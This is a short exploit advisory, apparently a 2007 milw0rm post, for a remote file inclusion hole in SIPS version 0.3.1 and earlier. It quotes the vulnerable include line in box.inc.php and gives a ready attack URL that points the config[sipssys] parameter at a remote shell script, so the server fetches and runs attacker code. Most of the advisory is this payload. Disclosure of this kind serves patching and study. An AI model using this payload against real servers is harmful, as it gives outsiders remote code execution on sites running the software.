39 lines
No EOL
716 B
Text
39 lines
No EOL
716 B
Text
*******************************************************************************
|
|
# Title : SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability
|
|
# Author : ajann
|
|
# Contact : :(
|
|
# S.Page : http://sourceforge.net/projects/sips/
|
|
# $$ : Free
|
|
|
|
*******************************************************************************
|
|
[[ERROR]]]
|
|
..
|
|
...
|
|
.....
|
|
<?
|
|
include $config["sipssys"] ."/code/rssparser.inc.php";
|
|
?>
|
|
..
|
|
...
|
|
.....
|
|
|
|
[[ERROR]]]
|
|
|
|
|
|
[[RFI]]]
|
|
|
|
http://[target]/[path]/sipssys/code/box.inc.php?config[sipssys]=[SHELL]
|
|
|
|
Example:
|
|
|
|
/sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x
|
|
|
|
[[/RFI]]
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2007-02-01] |